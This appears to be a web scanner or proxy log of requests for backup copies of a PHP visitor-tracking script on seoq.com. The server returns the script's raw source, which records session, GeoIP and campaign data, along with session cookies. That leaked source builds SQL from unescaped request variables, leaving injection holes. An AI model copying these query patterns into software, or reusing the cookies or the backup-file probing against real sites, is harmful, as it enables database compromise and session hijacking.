if ($urlToCheck == $campaign->URL) {
$matchedCampaigns[] = $campaign->ID;
}
}
}
}

// XXXX: This is not the correct way to handle this -- need to add multiple
// campaign support to the database!
echo "//BLVDC: $in_blvdC\n\n";
if ($in_blvdC == 0 && count($matchedCampaigns) > 0) {
$in_blvdC = $matchedCampaigns[0];
}

// Store this page hit
mysql_query(
<<<EOQ
INSERT INTO navigation(
`CameFrom`, `ReferrerDomain`, `CurrentPage`, `CurrentPageTitle`,
`ArrivalTime`, `SessionID`, `CurrentPageCampaignID`,
`DomainID`,
`ArrivalYear`, `ArrivalMonth`,
`ArrivalDay`, `ArrivalHour`,
`ArrivalWeekOfYear`
)
VALUES(
'$in_referrer', DomainNameFromURL('$in_referrer'), '$currentUrl', '$in_title',
UNIX_TIMESTAMP(), '$sessionId', '$in_blvdC',
(SELECT `ID` from `domains` d where d.`DomainName` = DomainNameFromURL('$currentUrl')),
YEAR(FROM_UNIXTIME(UNIX_TIMESTAMP())), MONTH(FROM_UNIXTIME(UNIX_TIMESTAMP())),
DAY(FROM_UNIXTIME(UNIX_TIMESTAMP())), HOUR(FROM_UNIXTIME(UNIX_TIMESTAMP())),
WEEK(FROM_UNIXTIME(UNIX_TIMESTAMP()), 6)
)
EOQ
);

if ($in_blvdC > 0) {
mysql_query(
<<<EOQ
INSERT INTO session_campaigns(SessionID, CampaignID, TimeOfConversion)
VALUES('$sessionId', '$in_blvdC', UNIX_TIMESTAMP())
EOQ
);
}

// Get the ID of the newly generated navigation row
$navigationId = mysql_insert_id();

// Process search engine information
findSearchEngineData($in_referrer, $navigationId);

// Tracking flags are blank for this script right now
$trackingFlags = 0;

require('trackingJS.php');

?>

- /blvdstatus/js/dynamicJS.php_2008_07_11_r2

/blvdstatus/js/dynamicJS.php_2008_07_11_r2

http://www.seoq.com/blvdstatus/js/dynamicJS.php_2008_07_11_r2

Request

GET /blvdstatus/js/dynamicJS.php_2008_07_11_r2 HTTP/1.1
Referer: http://www.seoq.com/blvdstatus/js/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.seoq.com
Cookie: PHPSESSID=sgei1l6e3nst43jti7f9ug76f0; CAKEPHP=3gmt3q74fne0s72akqsevm8685; temp_orgid=18bc00d6479f52c3222ea5887bfd07d0; temp_userid=42eb0c6051822e446cfea254f0248163
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:34:15 GMT
Server: Apache
Last-Modified: Fri, 11 Jul 2008 15:53:18 GMT
ETag: "2548010-212d-451c18a51d780"
Accept-Ranges: bytes
Content-Length: 8493
Keep-Alive: timeout=15, max=92
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

<?php
header('Content-type: text/javascript');

require_once("../inc/serverSetup.php");
require_once("../inc/database.php");

require_once("../lib/processing/findSearchEngineData.php");

import_request_variables('g', 'in_');

// Query the referrer URL (which in this case is the current page
// on the client's site) and visitor's IP address
if (isset($_SERVER['HTTP_REFERER'])) {
$currentUrl = $_SERVER['HTTP_REFERER'];
} else {
$currentUrl = '';
}

$ip = $_SERVER['REMOTE_ADDR'];

// Title of the page
if (!isset($in_title)) {
$in_title = '';
}

// blvdC - Campaign ID, if any
if (!isset($in_blvdC)) {
$in_blvdC = 0;
}

if (isset($in_screenWidth)) {
$in_screenWidth = (int)$in_screenWidth;
} else {
$in_screenWidth = 0;
}
if (isset($in_screenHeight)) {
$in_screenHeight = (int)$in_screenHeight;
} else {
$in_screenHeight = 0;
}
if (isset($in_screenDepth)) {
$in_screenDepth = (int)$in_screenDepth;
} else {
$in_screenDepth = 0;
}

$userAgent = $dbConnection->escape_string($_SERVER['HTTP_USER_AGENT']);
echo "//UA: $userAgent\n";

// If we have received a session id, maintain it, otherwise
// generate a new one
if (isset($in_blvdSessionId)) {
$sessionId = $in_blvdSessionId;
} else {
$sessionId = '';
}

echo "//Sess set.\n";

// Convert the domain name into a domain ID
// (If this fails, the domain ID will remain set to 0)
$domainId = 0;

$domainIdResults = $dbConnection->query(
"SELECT ConvertDomainNameToDomainID(DomainNameFromURL('$currentUrl')) AS `ID`"
);

// Tread carefully here, so errors don't break tracking!
if ($dbConnection->errno == 0) {
$domainIdData = $domainIdResults->fetch_object();
if ($domainIdData) {
$domainId = $domainIdData->ID;
}
}

// If this is a new session, generate a unique ID for it, and store it in
// the database
if ($sessionId == '') {
$sessionId = uniqid("", true);

// Query GeoIP data for the user's IP Address
$geoResultCollection = $dbConnection->multi_query("CALL LookupGeoIPData('$ip')");
$geoResults = $dbConnection->store_result();
if ($geoResults != null && gettype($geoResults) == 'object') {
$geoData = $geoResults->fetch_object();
echo "//GDA\n";
} else {
$geoData = new stdclass();
$geoData->CountryCode = '';
$geoData->Region = '';
$geoData->City = '';
$geoData->PostalCode = '';
$geoData->Latitude = '';
$geoData->Longitude = '';
$geoData->DMACode = '';
$geoData->AreaCode = '';
echo "//GDB\n";
}

// Purge any extraneous result sets
while ($dbConnection->next_result());

echo "//Geo: " . $dbConnection->error . "\n";

// Bind the session ID to the user's IP address
$dbConnection->query(
<<<EOQ
INSERT INTO `sessions`(
SessionID, IPAddress, SessionStartTime, ReferringURL, DomainID,
ScreenWidth, ScreenHeight, ScreenDepth, UserAgent,
GeoIPCountryCode, GeoIPRegion, GeoIPCity, GeoIPPostalCode,
GeoIPLatitude, GeoIPLongitude, GeoIPDMACode, GeoIPAreaCode,
GeoIPISP
)
VALUES(
'$sessionId', '$ip', UNIX_TIMESTAMP(), '$in_referrer', '$domainId',
'$in_screenWidth', '$in_screenHeight', '$in_screenDepth', '$userAgent',
'$geoData->CountryCode', '$geoData->Region', '$geoData->City', '$geoData->PostalCode',
'$geoData->Latitude', '$geoData->Longitude', '$geoData->DMACode', '$geoData->AreaCode',
'$geoData->ISP'
)
EOQ
);

echo "//Sess: " . $dbConnection->error . "\n";

// If necessary, store the user agent information in the 'user_agent_data'
// table.
$ua = get_browser($userAgent);
$browserName = $dbConnection->escape_string($ua->browser);
$browserVersion = $dbConnection->escape_string($ua->version);
$platform = $dbConnection->escape_string($ua->platform);

$dbConnection->query(
<<<EOQ
INSERT IGNORE INTO `user_agent_data`(
`UA`, `BrowserName`, `BrowserVersion`, `Platform`
)
VALUES(
'$userAgent', '$browserName', '$browserVersion', '$platform'
)
EOQ
);

echo "//UA: " . $dbConnection->error . "\n";
}

// *********************************
// Process campaigns for this domain
// *********************************

$matchedCampaigns = array();

echo "//D: $domainId\n";

// Retrieve all of the campaigns
if ($domainId > 0) {
$campaignResults = $dbConnection->query(
"SELECT * FROM `campaigns` WHERE `Active` = 1 AND `DomainID` = '$domainId'"
);

echo '//CRes: ' . $dbConnection->error . "\n";

while($campaign = $campaignResults->fetch_object()) {
echo "//$campaign->Title ($campaign->IdentifierType)\n";

if ($campaign->IdentifierType == 'Parameter') {
// Parameter-based campaign
echo "//Parameter based.\n";

$matched = false;

// Does the URL match the base URL defined by the
// campaign? (Skip this step if the URL is defined as '*')
if ($campaign->URL != '*') {
// TODO
}

// Parse the URL and extract the query string
$queryString = substr(
$currentUrl,
strpos($currentUrl, '?') + 1
);

$parameters = array();
parse_str($queryString, $parameters);

// Check if the parameter to check exists and then
// check if it is equal to the defined value
if (isset($parameters[$campaign->ParameterToCheck])) {
if ($parameters[$campaign->ParameterToCheck] == $campaign->ValueToCheck) {
$matched = true;
}
}

// If we matched, add the campaign ID to the campaign list
if ($matched) {
echo "//Matched\n";
$matchedCampaigns[] = $campaign->ID;
}
} else if ($campaign->IdentifierType == 'URL') {
// Are we checking the current or referring URL? If not, this
// campaign will need to be handled by the "leave.php" script!
if ($campaign->TriggerType == 'CurrentPage') {
$urlToCheck = $currentUrl;
} else if ($campaign->TriggerType == 'CameFrom') {
$urlToCheck = $in_referrer;
} else {
continue;
}

if ($urlToCheck == $campaign->URL) {
$matchedCampaigns[] = $campaign->ID;
}
}
}
}

// XXXX: This is not the correct way to handle this -- need to add multiple
// campaign support to the database!
echo "//BLVDC: $in_blvdC\n\n";
if ($in_blvdC == 0 && count($matchedCampaigns) > 0) {
$in_blvdC = $matchedCampaigns[0];
}

// Look for the previous hit for this session
$lastNavigationResults = $dbConnection->query(
<<<EOQ
SELECT *
FROM
`navigation` n
WHERE
n.`SessionID` = '$sessionId'
ORDER BY
n.`ID` DESC
LIMIT 1
EOQ
);

$lastNavigationItem = $lastNavigationResults->fetch_object();
if ($lastNavigationItem) {
if ((int)$lastNavigationItem->DepartureTime == 0) {
// Use the arrival time for this page as the departure time for the
// previous navigation item (this is not exact, but it is a good
// guess).
$dbConnection->query(
"UPDATE `navigation` " .
"SET `DepartureTime` = UNIX_TIMESTAMP() " .
"WHERE `ID` = '$lastNavigationItem->ID'"
);
echo "//LNI + DT: " . $dbConnection->error . " \n";
}
}

// Store this page hit
$dbConnection->query(
<<<EOQ
INSERT INTO navigation(
`CameFrom`, `ReferrerDomain`, `CurrentPage`, `CurrentPageTitle`,
`ArrivalTime`, `SessionID`, `CurrentPageCampaignID`,
`DomainID`,
`ArrivalYear`, `ArrivalMonth`,
`ArrivalDay`, `ArrivalHour`,
`ArrivalWeekOfYear`
)
VALUES(
'$in_referrer', DomainNameFromURL('$in_referrer'), '$currentUrl', '$in_title',
UNIX_TIMESTAMP(), '$sessionId', '$in_blvdC',
(SELECT `ID` from `domains` d where d.`DomainName` = DomainNameFromURL('$currentUrl')),
YEAR(FROM_UNIXTIME(UNIX_TIMESTAMP())), MONTH(FROM_UNIXTIME(UNIX_TIMESTAMP())),
DAY(FROM_UNIXTIME(UNIX_TIMESTAMP())), HOUR(FROM_UNIXTIME(UNIX_TIMESTAMP())),
WEEK(FROM_UNIXTIME(UNIX_TIMESTAMP()), 6)
)
EOQ
);

echo '//StoreNav: ' . $dbConnection->error . "\n";

// Get the ID of the newly generated navigation row
$navigationId = $dbConnection->insert_id;
//echo "//NID: $navigationId\n";

// Store campaign information for the session, if applicable
if ($in_blvdC > 0) {
$dbConnection->query(
<<<EOQ
INSERT INTO session_campaigns(SessionID, NavigationID, CampaignID, TimeOfConversion)
VALUES('$sessionId', '$navigationId', '$in_blvdC', UNIX_TIMESTAMP())
EOQ
);
}

// Process search engine information
findSearchEngineData($dbConnection, $in_referrer, $navigationId);

// Tracking flags are blank for this script right now
$trackingFlags = 0;

require('trackingJS.php');

?>

- /blvdstatus/js/dynamicJS.php_2008_07_30_r1

/blvdstatus/js/dynamicJS.php_2008_07_30_r1

http://www.seoq.com/blvdstatus/js/dynamicJS.php_2008_07_30_r1

Request

GET /blvdstatus/js/dynamicJS.php_2008_07_30_r1 HTTP/1.1
Referer: http://www.seoq.com/blvdstatus/js/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.seoq.com
Cookie: PHPSESSID=sgei1l6e3nst43jti7f9ug76f0; CAKEPHP=3gmt3q74fne0s72akqsevm8685; temp_orgid=18bc00d6479f52c3222ea5887bfd07d0; temp_userid=42eb0c6051822e446cfea254f0248163
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:34:15 GMT
Server: Apache
Last-Modified: Fri, 25 Jul 2008 16:17:24 GMT
ETag: "2548013-2555-452db82494d00"
Accept-Ranges: bytes
Content-Length: 9557
Keep-Alive: timeout=15, max=90
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

<?php
header('Content-type: text/javascript');

require_once("../inc/serverSetup.php");
require_once("../inc/database.php");

require_once("../lib/processing/findSearchEngineData.php");

import_request_variables('g', 'in_');

// Query the referrer URL (which in this case is the current page
// on the client's site) and visitor's IP address
if (isset($_SERVER['HTTP_REFERER'])) {
$currentUrl = $_SERVER['HTTP_REFERER'];
} else {
$currentUrl = '';
}

// Get a version of the URL with no query string
if (strpos($currentUrl, '?') !== false) {
$currentUrlNoQuery = substr($currentUrl, 0, strpos($currentUrl, '?'));
} else {
$currentUrlNoQuery = $currentUrl;
}

$ip = $_SERVER['REMOTE_ADDR'];

// Referrer
if (isset($in_referrer)) {
if (strpos($in_referrer, '?') !== false) {
$in_referrerNoQuery = substr($in_referrer, 0, strpos($in_referrer, '?'));
} else {
$in_referrerNoQuery = $in_referrer;
}
} else {
$in_referrer = '';
$in_referrerNoQuery = '';
}

// Title of the page
if (!isset($in_title)) {
$in_title = '';
}

// blvdC - Campaign ID, if any
if (!isset($in_blvdC)) {
$in_blvdC = 0;
}

if (isset($in_screenWidth)) {
$in_screenWidth = (int)$in_screenWidth;
} else {
$in_screenWidth = 0;
}
if (isset($in_screenHeight)) {
$in_screenHeight = (int)$in_screenHeight;
} else {
$in_screenHeight = 0;
}
if (isset($in_screenDepth)) {
$in_screenDepth = (int)$in_screenDepth;
} else {
$in_screenDepth = 0;
}

$userAgent = $dbConnection->escape_string($_SERVER['HTTP_USER_AGENT']);
echo "//UA: $userAgent\n";

// If we have received a session id, maintain it, otherwise
// generate a new one
if (isset($in_blvdSessionId)) {
$sessionId = $in_blvdSessionId;
} else {
$sessionId = '';
}

echo "//Sess set.\n";

// Convert the domain name into a domain ID
// (If this fails, the domain ID will remain set to 0)
$domainId = 0;

$domainIdResults = $dbConnection->query(
"SELECT ConvertDomainNameToDomainID(DomainNameFromURL('$currentUrl')) AS `ID`"
);

// Tread carefully here, so errors don't break tracking!
if ($dbConnection->errno == 0) {
$domainIdData = $domainIdResults->fetch_object();
if ($domainIdData) {
$domainId = $domainIdData->ID;
}
}

// If this is a new session, generate a unique ID for it, and store it in
// the database
if ($sessionId == '') {
$sessionId = uniqid("", true);

// Query GeoIP data for the user's IP Address
$geoRecord = geoip_record_by_name($ip);

if ($geoRecord === false) {
$geoData = new stdclass();
$geoData->CountryCode = '';
$geoData->Region = '';
$geoData->City = '';
$geoData->PostalCode = '';
$geoData->Latitude = '';
$geoData->Longitude = '';
$geoData->DMACode = '';
$geoData->AreaCode = '';
$geoData->ISP = '';
} else {
$geoData = new stdclass();
$geoData->CountryCode = $geoRecord['country_code'];
$geoData->Region = $geoRecord['region'];
$geoData->City = $geoRecord['city'];
$geoData->PostalCode = $geoRecord['postal_code'];
$geoData->Latitude = $geoRecord['latitude'];
$geoData->Longitude = $geoRecord['longitude'];
$geoData->DMACode = $geoRecord['dma_code'];
$geoData->AreaCode = $geoRecord['area_code'];
$geoData->ISP = geoip_isp_by_name($ip);
}

// Bind the session ID to the user's IP address
$dbConnection->query(
<<<EOQ
INSERT INTO `sessions`(
SessionID, IPAddress, SessionStartTime, ReferringURL, DomainID,
ScreenWidth, ScreenHeight, ScreenDepth, UserAgent,
GeoIPCountryCode, GeoIPRegion, GeoIPCity, GeoIPPostalCode,
GeoIPLatitude, GeoIPLongitude, GeoIPDMACode, GeoIPAreaCode,
GeoIPISP
)
VALUES(
'$sessionId', '$ip', UNIX_TIMESTAMP(), '$in_referrer', '$domainId',
'$in_screenWidth', '$in_screenHeight', '$in_screenDepth', '$userAgent',
'$geoData->CountryCode', '$geoData->Region', '$geoData->City', '$geoData->PostalCode',
'$geoData->Latitude', '$geoData->Longitude', '$geoData->DMACode', '$geoData->AreaCode',
'$geoData->ISP'
)
EOQ
);

echo "//Sess: " . $dbConnection->error . "\n";

// If necessary, store the user agent information in the 'user_agent_data'
// table.
$ua = get_browser($userAgent);
$browserName = $dbConnection->escape_string($ua->browser);
$browserVersion = $dbConnection->escape_string($ua->version);
$platform = $dbConnection->escape_string($ua->platform);

$dbConnection->query(
<<<EOQ
INSERT IGNORE INTO `user_agent_data`(
`UA`, `BrowserName`, `BrowserVersion`, `Platform`
)
VALUES(
'$userAgent', '$browserName', '$browserVersion', '$platform'
)
EOQ
);

echo "//UA: " . $dbConnection->error . "\n";
}

// *********************************
// Process campaigns for this domain
// *********************************

$matchedCampaigns = array();

echo "//D: $domainId\n";

// Retrieve all of the campaigns
if ($domainId > 0) {
$campaignResults = $dbConnection->query(
"SELECT * FROM `campaigns` WHERE `Active` = 1 AND `DomainID` = '$domainId'"
);

echo '//CRes: ' . $dbConnection->error . "\n";

while($campaign = $campaignResults->fetch_object()) {
echo "//$campaign->Title ($campaign->IdentifierType)\n";

if ($campaign->IdentifierType == 'Parameter') {
// Parameter-based campaign
echo "//Parameter based.\n";

$matched = false;

// Does the URL match the base URL defined by the
// campaign? (Skip this step if the URL is defined as '*')
if ($campaign->URL != '*') {
// TODO
}

// Parse the URL and extract the query string
$queryString = substr(
$currentUrl,
strpos($currentUrl, '?') + 1
);

$parameters = array();
parse_str($queryString, $parameters);

// Check if the parameter to check exists and then
// check if it is equal to the defined value
if (isset($parameters[$campaign->ParameterToCheck])) {
if ($parameters[$campaign->ParameterToCheck] == $campaign->ValueToCheck) {
$matched = true;
}
}

// If we matched, add the campaign ID to the campaign list
if ($matched) {
echo "//Matched\n";
$matchedCampaigns[] = $campaign->ID;
}
} else if ($campaign->IdentifierType == 'URL') {
// Are we checking the current or referring URL? If not, this
// campaign will need to be handled by the "leave.php" script!
if ($campaign->TriggerType == 'CurrentPage') {
$urlToCheck = $currentUrl;
$urlToCheckNoQuery = $currentUrlNoQuery;
} else if ($campaign->TriggerType == 'CameFrom') {
$urlToCheck = $in_referrer;
$urlToCheck = $in_referrerNoQuery;
} else {
continue;
}

if ($campaign->IgnoreQueryString == '1') {
if ($urlToCheckNoQuery == $campaign->URL) {
$matchedCampaigns[] = $campaign->ID;
}
} else {
if ($urlToCheck == $campaign->URL) {
$matchedCampaigns[] = $campaign->ID;
}
}
}
}
}

// XXXX: This is not the correct way to handle this -- need to add multiple
// campaign support to the database!
echo "//BLVDC: $in_blvdC\n\n";
if ($in_blvdC == 0 && count($matchedCampaigns) > 0) {
$in_blvdC = $matchedCampaigns[0];
}

// Look for the previous hit for this session
$lastNavigationResults = $dbConnection->query(
<<<EOQ
SELECT *
FROM
`navigation` n
WHERE
n.`SessionID` = '$sessionId'
ORDER BY
n.`ID` DESC
LIMIT 1
EOQ
);

$lastNavigationItem = $lastNavigationResults->fetch_object();
if ($lastNavigationItem) {
if ((int)$lastNavigationItem->DepartureTime == 0) {
// Use the arrival time for this page as the departure time for the
// previous navigation item (this is not exact, but it is a good
// guess).
$dbConnection->query(
"UPDATE `navigation` " .
"SET `DepartureTime` = UNIX_TIMESTAMP() " .
"WHERE `ID` = '$lastNavigationItem->ID'"
);
echo "//LNI + DT: " . $dbConnection->error . " \n";
}
}

// Store this page hit
$safeTitle = $dbConnection->escape_string($in_title);
$safeCurrentUrl = $dbConnection->escape_string($currentUrl);
$safeReferrer = $dbConnection->escape_string($in_referrer);

$dbConnection->query(
<<<EOQ
INSERT INTO navigation(
`CameFrom`, `ReferrerDomain`, `CurrentPage`, `CurrentPageTitle`,
`ArrivalTime`, `SessionID`, `CurrentPageCampaignID`,
`DomainID`,
`ArrivalYear`, `ArrivalMonth`,
`ArrivalDay`, `ArrivalHour`,
`ArrivalWeekOfYear`
)
VALUES(
'$in_referrer', DomainNameFromURL('$safeReferrer'), '$safeCurrentUrl', '$safeTitle',
UNIX_TIMESTAMP(), '$sessionId', '$in_blvdC',
ConvertDomainNameToDomainId(DomainNameFromURL('$safeCurrentUrl')),
YEAR(FROM_UNIXTIME(UNIX_TIMESTAMP())), MONTH(FROM_UNIXTIME(UNIX_TIMESTAMP())),
DAY(FROM_UNIXTIME(UNIX_TIMESTAMP())), HOUR(FROM_UNIXTIME(UNIX_TIMESTAMP())),
WEEK(FROM_UNIXTIME(UNIX_TIMESTAMP()), 6)
)
EOQ
);

echo '//StoreNav: ' . $dbConnection->error . "\n";

// Get the ID of the newly generated navigation row
$navigationId = $dbConnection->insert_id;
//echo "//NID: $navigationId\n";

// Store campaign information for the session, if applicable
if ($in_blvdC > 0) {
$dbConnection->query(
<<<EOQ
INSERT INTO session_campaigns(SessionID, NavigationID, CampaignID, TimeOfConversion)
VALUES('$sessionId', '$navigationId', '$in_blvdC', UNIX_TIMESTAMP())
EOQ
);
}

// Process search engine information
findSearchEngineData($dbConnection, $in_referrer, $navigationId);

// Tracking flags are blank for this script right now
$trackingFlags = 0;

require('trackingJS.php');

?>

- /blvdstatus/js/dynamicJS.php_2008_07_11_r1

/blvdstatus/js/dynamicJS.php_2008_07_11_r1

http://www.seoq.com/blvdstatus/js/dynamicJS.php_2008_07_11_r1

Request

GET /blvdstatus/js/dynamicJS.php_2008_07_11_r1 HTTP/1.1
Referer: http://www.seoq.com/blvdstatus/js/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.seoq.com
Cookie: PHPSESSID=sgei1l6e3nst43jti7f9ug76f0; CAKEPHP=3gmt3q74fne0s72akqsevm8685; temp_orgid=18bc00d6479f52c3222ea5887bfd07d0; temp_userid=42eb0c6051822e446cfea254f0248163
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:34:15 GMT
Server: Apache
Last-Modified: Mon, 07 Jul 2008 15:39:34 GMT
ETag: "254800f-1fcd-45170e1d71980"
Accept-Ranges: bytes
Content-Length: 8141
Keep-Alive: timeout=15, max=88
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

<?php
header('Content-type: text/javascript');

require_once("../inc/serverSetup.php");
require_once("../inc/database.php");

require_once("../lib/processing/findSearchEngineData.php");

import_request_variables('g', 'in_');

// Query the referrer URL (which in this case is the current page
// on the client's site) and visitor's IP address
if (isset($_SERVER['HTTP_REFERER'])) {
$currentUrl = $_SERVER['HTTP_REFERER'];
} else {
$currentUrl = '';
}

$ip = $_SERVER['REMOTE_ADDR'];

// Title of the page
if (!isset($in_title)) {
$in_title = '';
}

// blvdC - Campaign ID, if any
if (!isset($in_blvdC)) {
$in_blvdC = 0;
}

if (isset($in_screenWidth)) {
$in_screenWidth = (int)$in_screenWidth;
} else {
$in_screenWidth = 0;
}
if (isset($in_screenHeight)) {
$in_screenHeight = (int)$in_screenHeight;
} else {
$in_screenHeight = 0;
}
if (isset($in_screenDepth)) {
$in_screenDepth = (int)$in_screenDepth;
} else {
$in_screenDepth = 0;
}

$userAgent = $dbConnection->escape_string($_SERVER['HTTP_USER_AGENT']);
echo "//UA: $userAgent\n";

// If we have received a session id, maintain it, otherwise
// generate a new one
if (isset($in_blvdSessionId)) {
$sessionId = $in_blvdSessionId;
} else {
$sessionId = '';
}

echo "//Sess set.\n";

// Convert the domain name into a domain ID
// (If this fails, the domain ID will remain set to 0)
$domainId = 0;

$domainIdResults = $dbConnection->query(
"SELECT ConvertDomainNameToDomainID(DomainNameFromURL('$currentUrl')) AS `ID`"
);

// Tread carefully here, so errors don't break tracking!
if ($dbConnection->errno == 0) {
$domainIdData = $domainIdResults->fetch_object();
if ($domainIdData) {
$domainId = $domainIdData->ID;
}
}

// If this is a new session, generate a unique ID for it, and store it in
// the database
if ($sessionId == '') {
$sessionId = uniqid("", true);

// Query GeoIP data for the user's IP Address
$geoResultCollection = $dbConnection->multi_query("CALL LookupGeoIPData('$ip')");
$geoResults = $dbConnection->store_result();
$geoData = $geoResults->fetch_object();

echo "//GDA\n";

// Purge any extraneous result sets
while ($dbConnection->next_result());

echo "//Geo: " . $dbConnection->error . "\n";

// Bind the session ID to the user's IP address
$dbConnection->query(
<<<EOQ
INSERT INTO `sessions`(
SessionID, IPAddress, SessionStartTime, ReferringURL, DomainID,
ScreenWidth, ScreenHeight, ScreenDepth, UserAgent,
GeoIPCountryCode, GeoIPRegion, GeoIPCity, GeoIPPostalCode,
GeoIPLatitude, GeoIPLongitude, GeoIPDMACode, GeoIPAreaCode,
GeoIPISP
)
VALUES(
'$sessionId', '$ip', UNIX_TIMESTAMP(), '$in_referrer', '$domainId',
'$in_screenWidth', '$in_screenHeight', '$in_screenDepth', '$userAgent',
'$geoData->CountryCode', '$geoData->Region', '$geoData->City', '$geoData->PostalCode',
'$geoData->Latitude', '$geoData->Longitude', '$geoData->DMACode', '$geoData->AreaCode',
'$geoData->ISP'
)
EOQ
);

echo "//Sess: " . $dbConnection->error . "\n";

// If necessary, store the user agent information in the 'user_agent_data'
// table.
$ua = get_browser($userAgent);
$browserName = $dbConnection->escape_string($ua->browser);
$browserVersion = $dbConnection->escape_string($ua->version);
$platform = $dbConnection->escape_string($ua->platform);

$dbConnection->query(
<<<EOQ
INSERT IGNORE INTO `user_agent_data`(
`UA`, `BrowserName`, `BrowserVersion`, `Platform`
)
VALUES(
'$userAgent', '$browserName', '$browserVersion', '$platform'
)
EOQ
);

echo "//UA: " . $dbConnection->error . "\n";
}

// *********************************
// Process campaigns for this domain
// *********************************

$matchedCampaigns = array();

echo "//D: $domainId\n";

// Retrieve all of the campaigns
if ($domainId > 0) {
$campaignResults = $dbConnection->query(
"SELECT * FROM `campaigns` WHERE `Active` = 1 AND `DomainID` = '$domainId'"
);

echo '//CRes: ' . $dbConnection->error . "\n";

while($campaign = $campaignResults->fetch_object()) {
echo "//$campaign->Title ($campaign->IdentifierType)\n";

if ($campaign->IdentifierType == 'Parameter') {
// Parameter-based campaign
echo "//Parameter based.\n";

$matched = false;

// Does the URL match the base URL defined by the
// campaign? (Skip this step if the URL is defined as '*')
if ($campaign->URL != '*') {
// TODO
}

// Parse the URL and extract the query string
$queryString = substr(
$currentUrl,
strpos($currentUrl, '?') + 1
);

$parameters = array();
parse_str($queryString, $parameters);

// Check if the parameter to check exists and then
// check if it is equal to the defined value
if (isset($parameters[$campaign->ParameterToCheck])) {
if ($parameters[$campaign->ParameterToCheck] == $campaign->ValueToCheck) {
$matched = true;
}
}

// If we matched, add the campaign ID to the campaign list
if ($matched) {
echo "//Matched\n";
$matchedCampaigns[] = $campaign->ID;
}
} else if ($campaign->IdentifierType == 'URL') {
// Are we checking the current or referring URL? If not, this
// campaign will need to be handled by the "leave.php" script!
if ($campaign->TriggerType == 'CurrentPage') {
$urlToCheck = $currentUrl;
} else if ($campaign->TriggerType == 'CameFrom') {
$urlToCheck = $in_referrer;
} else {
continue;
}

if ($urlToCheck == $campaign->URL) {
$matchedCampaigns[] = $campaign->ID;
}
}
}
}

// XXXX: This is not the correct way to handle this -- need to add multiple
// campaign support to the database!
echo "//BLVDC: $in_blvdC\n\n";
if ($in_blvdC == 0 && count($matchedCampaigns) > 0) {
$in_blvdC = $matchedCampaigns[0];
}

// Look for the previous hit for this session
$lastNavigationResults = $dbConnection->query(
<<<EOQ
SELECT *
FROM
`navigation` n
WHERE
n.`SessionID` = '$sessionId'
ORDER BY
n.`ID` DESC
LIMIT 1
EOQ
);

$lastNavigationItem = $lastNavigationResults->fetch_object();
if ($lastNavigationItem) {
if ((int)$lastNavigationItem->DepartureTime == 0) {
// Use the arrival time for this page as the departure time for the
// previous navigation item (this is not exact, but it is a good
// guess).
$dbConnection->query(
"UPDATE `navigation` " .
"SET `DepartureTime` = UNIX_TIMESTAMP() " .
"WHERE `ID` = '$lastNavigationItem->ID'"
);
echo "//LNI + DT: " . $dbConnection->error . " \n";
}
}

// Store this page hit
$dbConnection->query(
<<<EOQ
INSERT INTO navigation(
`CameFrom`, `ReferrerDomain`, `CurrentPage`, `CurrentPageTitle`,
`ArrivalTime`, `SessionID`, `CurrentPageCampaignID`,
`DomainID`,
`ArrivalYear`, `ArrivalMonth`,
`ArrivalDay`, `ArrivalHour`,
`ArrivalWeekOfYear`
)
VALUES(
'$in_referrer', DomainNameFromURL('$in_referrer'), '$currentUrl', '$in_title',
UNIX_TIMESTAMP(), '$sessionId', '$in_blvdC',
(SELECT `ID` from `domains` d where d.`DomainName` = DomainNameFromURL('$currentUrl')),
YEAR(FROM_UNIXTIME(UNIX_TIMESTAMP())), MONTH(FROM_UNIXTIME(UNIX_TIMESTAMP())),
DAY(FROM_UNIXTIME(UNIX_TIMESTAMP())), HOUR(FROM_UNIXTIME(UNIX_TIMESTAMP())),
WEEK(FROM_UNIXTIME(UNIX_TIMESTAMP()), 6)
)
EOQ
);

echo '//StoreNav: ' . $dbConnection->error . "\n";

// Get the ID of the newly generated navigation row
$navigationId = $dbConnection->insert_id;
//echo "//NID: $navigationId\n";

// Store campaign information for the session, if applicable
if ($in_blvdC > 0) {
$dbConnection->query(
<<<EOQ
INSERT INTO session_campaigns(SessionID, NavigationID, CampaignID, TimeOfConversion)
VALUES('$sessionId', '$navigationId', '$in_blvdC', UNIX_TIMESTAMP())
EOQ
);
}

// Process search engine information
findSearchEngineData($dbConnection, $in_referrer, $navigationId);

// Tracking flags are blank for this script right now
$trackingFlags = 0;

require('trackingJS.php');

?>

- /blvdstatus/js/dynamicJS.php_2008_07_30_r2

/blvdstatus/js/dynamicJS.php_2008_07_30_r2

http://www.seoq.com/blvdstatus/js/dynamicJS.php_2008_07_30_r2

Request

GET /blvdstatus/js/dynamicJS.php_2008_07_30_r2 HTTP/1.1
Referer: http://www.seoq.com/blvdstatus/js/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.seoq.com
Cookie: PHPSESSID=sgei1l6e3nst43jti7f9ug76f0; CAKEPHP=3gmt3q74fne0s72akqsevm8685; temp_orgid=18bc00d6479f52c3222ea5887bfd07d0; temp_userid=42eb0c6051822e446cfea254f0248163
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:34:15 GMT
Server: Apache
Last-Modified: Wed, 30 Jul 2008 14:41:57 GMT
ETag: "2548014-2604-4533ec2231740"
Accept-Ranges: bytes
Content-Length: 9732
Keep-Alive: timeout=15, max=96
Connection: Keep-Alive
